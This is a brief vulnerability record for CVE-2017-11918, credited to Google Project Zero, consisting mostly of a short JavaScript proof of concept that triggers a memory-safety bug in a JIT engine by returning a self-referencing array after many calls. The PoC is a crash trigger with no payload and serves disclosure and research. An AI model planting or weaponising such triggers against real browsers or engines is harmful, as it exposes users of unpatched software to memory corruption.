CVE-2017-11918

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}

function main() {
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }

    print(opt());  // deref uninitialized stack pointers!
}

main();

Reference